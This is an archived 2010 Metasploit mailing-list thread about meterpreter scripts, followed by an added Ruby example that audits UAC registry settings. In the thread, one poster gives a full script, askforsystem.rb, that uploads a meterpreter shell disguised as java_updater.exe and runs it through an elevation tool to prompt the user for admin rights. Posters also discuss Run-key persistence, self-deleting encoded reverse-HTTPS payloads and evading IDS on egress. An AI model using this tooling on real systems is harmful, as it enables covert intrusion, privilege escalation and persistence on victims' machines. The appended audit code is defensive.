
List:       metasploit-framework
Subject:    Re: [framework] uploadexec and kitrap0d
From:       Carlos Perez <carlos_perez () darkoperator ! com>
Date:       2010-07-12 18:26:10
Message-ID: 6D9F2B37-A7FA-4ADB-BE6F-0C5227E0A4D4 () darkoperator ! com


Here is the mixin

http://www.metasploit.com/redmine/projects/framework/repository/show/lib/msf/scripts

Here are the common calls:

http://www.metasploit.com/redmine/projects/framework/repository/entry/lib/msf/scripts/meterpreter/common.rb


The call would be is_uac_enabled?

Here is where I mention we can put what you are working on with railgun


Sent from my iPhone

On Jul 12, 2010, at 1:08 PM, Rob Fuller <mubix@room362.com> wrote:

> That's a pretty pimp script. Carlos? Some of the UAC checks would also be handy in other scripts as well.
> Nice work Devin!
> 
> --
> Rob Fuller | Mubix 
> Room362.com | Hak5.org 
> 
> 
> On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch@gmail.com> wrote:
> 
> Kitrap0d never works in the wild, in my experience (too old now). If you're into social engineering and the rules of engagement permit it, I wrote a cheap hack called askforsystem.rb. Essentially, it copies over a couple of files from the "Elevate" Windows power tool, and a new shell. It then executes the new shell with high IL privileges (which prompts the user with UAC). I chose the name java_updater.exe for the new shell. It's cheap, but it works more often than not.
> To use, copy all the files from the elevate power tool to your msf data directory (extract the archive first):
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
> Then copy a meterpreter shell executable named shell.exe into your msf data directory. The name is hard-coded right now. Sorry.
> Then save the following script to your meterpreter scripts directory as askforsystem.rb:
> ----- cut -----
> ######################################################
> # AskForSystem:  Bypass UAC by, well, asking for it  #
> ######################################################
> session = client
> host, port = session.tunnel_peer.split(':')
> 
> # Returns true only on Vista/7, when we are not already SYSTEM and
> # HKLM\...\Policies\System\EnableLUA is set to 1.
> def uaccheck(session)
>   uac = false
>   winversion = session.sys.config.sysinfo
>   if winversion['OS'] =~ /(Vista|7)/
>     if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
>       print_status("Checking if UAC is enabled ...")
>       key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
>       root_key, base_key = session.sys.registry.splitkey(key)
>       value = "EnableLUA"
>       open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
>       v = open_key.query_value(value)
>       if v.data == 1
>         print_status("\tUAC is Enabled")
>         uac = true
>       else
>         print_status("\tUAC is Disabled")
>       end
>     end
>   end
>   return uac
> end
> 
> # Uploads a local file into the target's %TEMP% and returns the remote path.
> def upload(session, file, fileontrgt)
>   location = session.fs.file.expand_path("%TEMP%")
>   fileontrgt = "#{location}\\" + fileontrgt
>   print_status("Uploading File #{file} ...")
>   session.fs.file.upload_file("#{fileontrgt}", "#{file}")
>   print_status("Upload Complete ...")
>   return fileontrgt
> end
> 
> # Runs the uploaded file through elevate.cmd, which is what raises the UAC prompt.
> def execute_as_system(session, file)
>   location = session.fs.file.expand_path("%TEMP%")
>   print_status("Running Commands ...")
>   session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}",
>                               nil, {'Hidden' => true, 'Channelized' => false})
> end
> 
> unless uaccheck(session)
>   print_status("UAC isn't running, don't bother...")
>   raise Rex::Script::Completed
> end
> 
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell      = File.join(Msf::Config.install_root, "data", "shell.exe")
> 
> upload(session, elevatecmd, "elevate.cmd")
> upload(session, elevatevbs, "elevate.vbs")
> upload(session, shell, "java_updater.exe")
> 
> sleep 1
> 
> print_status("Executing shell as system...")
> execute_as_system(session, "java_updater.exe")
> ----cut----
> 
> My ruby sucks, but you get the idea. If someone wants to take the above script and add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my guest. Also keep in mind that UAC isn't that big of an obstacle to pen testing... you can still read all of the user's data. You can also still write to several directories in their profile (AppData is shown as the target above). You can also make meterpreter persistent by writing to the HKCU\software\microsoft\windows\currentversion\run key. But no hashes :(
> Invisible Things Lab blog has a great writeup of UAC here:
> http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html
> Especially relevant is the criticism that it doesn't protect any user data, it just prevents machines from being malware-infested bots.
> Devin
> 
> 
> 
> 
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
> Just tried it. Working like a charm now. Uploaded and executed without a problem.
> I should be the one thanking you for sharing so much of your knowledge. Your scripts rock and I have learned tons from reading you over the years.
> I also noticed the kitrap0d script didn't work on the Win 7 machine, probably all patched by now. I know that getprivs has gone through some changes, so what's the best script to run right off the bat when you have meterpreter running as a non-privileged user, before running scraper, hashdump and the like?
> 
> cheers
> --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
> 
> From: Carlos Perez <carlos_perez@darkoperator.com>
> Subject: Re: [framework] Meterpreter unexpectedly closes
> To: "Miguel Rios" <miguelrios35@yahoo.com>
> Cc: framework@spool.metasploit.com
> Date: Saturday, July 10, 2010, 1:45 PM
> 
> svn up and give it a try now, it should be fixed. Thanks for reporting it
> 
> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
> 
> > Thanks Carlos.
> > Here's the output: running against a win 7 7600 build (english) machine.
> > 
> > meterpreter > run uploadexec -e /root/notepad.exe
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -o /Q
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -v
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter >           
> > 
> > --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
> > 
> > From: Carlos Perez <carlos_perez@darkoperator.com>
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35@yahoo.com>
> > Cc: "Alex Polychronopoulos" <tweakier@gmail.com>, framework@spool.metasploit.com
> > Date: Saturday, July 10, 2010, 12:49 PM
> > 
> > Miguel 
> > 
> > Do send me the output of what you're getting and the command itself and I will take a look.
> > Cheers,
> > Carlos
> > 
> > On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote:
> > > Thanks. That explains it perfectly. For some reason I thought that meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS, but the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously won't be there to respawn meterpreter. A bit of a catch-22.
> > > Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use 'at' and 'schtasks', I believe) or have it auto-run at startup through the registry and have a listener permanently set up on the internet, listening and ready to run a bunch of scripts like scraper, etc. (by the way, any literature out there on setting up just meterpreter listeners and scripts on a webserver, or do I have to set up the full MSF on the server?).
> > > Thanks also to 5.K1dd for responding, but Alex cleared it up perfectly. It wasn't a question of the exploited process dying, since it's a standalone meterpreter binary I'm playing with.
> > > Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with reverse_tcp. That would be super stealthy and highly effective at egressing the most restrictive networks.
> > > P.S. Off topic here, but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to %temp% but it doesn't execute, and the script spits out some error message about wrong count (4 of 1 or something like that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to be silently executed, but I must be missing something stupidly obvious. Time to sleep maybe.
> > > --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier@gmail.com> wrote:
> > > 
> > > From: Alex Polychronopoulos <tweakier@gmail.com>
> > > Subject: Re: [framework] Meterpreter unexpectedly closes
> > > To: "Miguel Rios" <miguelrios35@yahoo.com>
> > > Cc: framework@spool.metasploit.com
> > > Date: Saturday, July 10, 2010, 8:28 AM
> > > 
> > > Meterpreter is designed not to persistently try to connect back to the handler; it tries once and then dies, so you're not doing anything wrong. What you can do here is try the msfencode -t loop_vbs option, which converts the payload into a VBScript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file).
> > > On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
> > > Hi list,
> > > I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine when I test it on my XP SP3. I see the outbound connection and the process running, but after about a minute or so the process dies if there's no listener configured on the receiving end, and it doesn't respawn. What am I doing wrong here? I must be missing something obvious. Is there a timeout option for this reverse shell, or a way to keep the process always running even if it can't connect to the listener? Or is it that msfencoding the payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it; it's just the fact that it times out so quickly that is a pain.
> > > Also, I saw the reverse_tcp allports payload and was wondering if there's a similar one for reverse meterpreter https. Ideally one could configure default ports to try first and then keep trying the other 65000 or so at random to evade IDS. I know this would increase the payload size, but it would be pretty stealthy egress-wise.
> > > Thanks. I do really love metasploit and the whole community behind it. You all rock.
> > > Miguel
> > > 
> > > 
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework


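The uaccheck routine in Devin's script and the is_uac_enabled? call Carlos points to both answer one question, "is EnableLUA set to 1", by reading HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The following is an added example, not code from this thread or from the Metasploit Framework, that goes a little further on the same key: it parses the text of a `reg query` run against that key (the sample output below is constructed), applies the Vista/7 defaults when a value is absent (something uaccheck does not handle, since query_value raises on a missing value), and reports which of the documented UAC settings are weak. The value meanings for ConsentPromptBehaviorAdmin and PromptOnSecureDesktop are the ones Microsoft documents for those registry values; the function and constant names are this example's own.

```ruby
# Added example: audit UAC posture from the registry values under the key the
# thread's uaccheck reads. Not from the thread or the framework.
UAC_KEY = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'

# Windows defaults (Vista/7) applied when a value is not present under the key.
UAC_DEFAULTS = {
  'EnableLUA'                  => 1,
  'ConsentPromptBehaviorAdmin' => 5,
  'PromptOnSecureDesktop'      => 1,
}.freeze

# Documented meanings of ConsentPromptBehaviorAdmin.
ADMIN_PROMPT_BEHAVIOR = {
  0 => 'elevate without prompting',
  1 => 'prompt for credentials on the secure desktop',
  2 => 'prompt for consent on the secure desktop',
  3 => 'prompt for credentials',
  4 => 'prompt for consent',
  5 => 'prompt for consent for non-Windows binaries',
}.freeze

# Parse `reg query` output into { name => Integer } for REG_DWORD values only.
# The key path line, blank lines and values of other types are skipped.
def parse_reg_query(text)
  values = {}
  text.each_line do |line|
    m = line.match(/^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$/)
    values[m[1]] = m[2].to_i(16) if m
  end
  values
end

# Resolve a value, falling back to the Windows default when it is absent.
def uac_setting(values, name)
  values.fetch(name, UAC_DEFAULTS.fetch(name))
end

# True when UAC is on. A missing EnableLUA counts as enabled (the Vista/7
# default), unlike a check that only handles an explicit value.
def uac_enabled?(values)
  uac_setting(values, 'EnableLUA') == 1
end

# Effective settings plus a list of weak-configuration findings.
def audit_uac(values)
  behavior = uac_setting(values, 'ConsentPromptBehaviorAdmin')
  secure   = uac_setting(values, 'PromptOnSecureDesktop')
  findings = []
  unless uac_enabled?(values)
    findings << 'EnableLUA=0: UAC is off; administrators run every process at high integrity'
  end
  if behavior == 0
    findings << 'ConsentPromptBehaviorAdmin=0: administrators elevate silently, no prompt'
  end
  if secure == 0
    findings << 'PromptOnSecureDesktop=0: elevation prompts appear on the interactive desktop, where other user-level programs can draw over them'
  end
  {
    key:            UAC_KEY,
    enabled:        uac_enabled?(values),
    behavior:       ADMIN_PROMPT_BEHAVIOR.fetch(behavior, "unknown value #{behavior}"),
    secure_desktop: secure == 1,
    findings:       findings,
  }
end

# Constructed sample of `reg query` output for a default Windows 7 machine.
REG_QUERY_SAMPLE = <<~OUT
  HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
      ConsentPromptBehaviorAdmin    REG_DWORD    0x5
      ConsentPromptBehaviorUser    REG_DWORD    0x3
      EnableLUA    REG_DWORD    0x1
      PromptOnSecureDesktop    REG_DWORD    0x1
      dontdisplaylastusername    REG_DWORD    0x0
      legalnoticecaption    REG_SZ
OUT

if $PROGRAM_NAME == __FILE__
  report = audit_uac(parse_reg_query(REG_QUERY_SAMPLE))
  puts "UAC enabled: #{report[:enabled]}, admin prompt: #{report[:behavior]}"
  report[:findings].each { |f| puts "  [!] #{f}" }
end
```

On the constructed sample the audit reports UAC enabled with no findings; feeding it a hash with EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop all set to 0 yields three findings. Taking a Hash rather than a live registry handle keeps the logic testable offline; in a meterpreter script the same hash could be filled from open_key(...).query_value for each name.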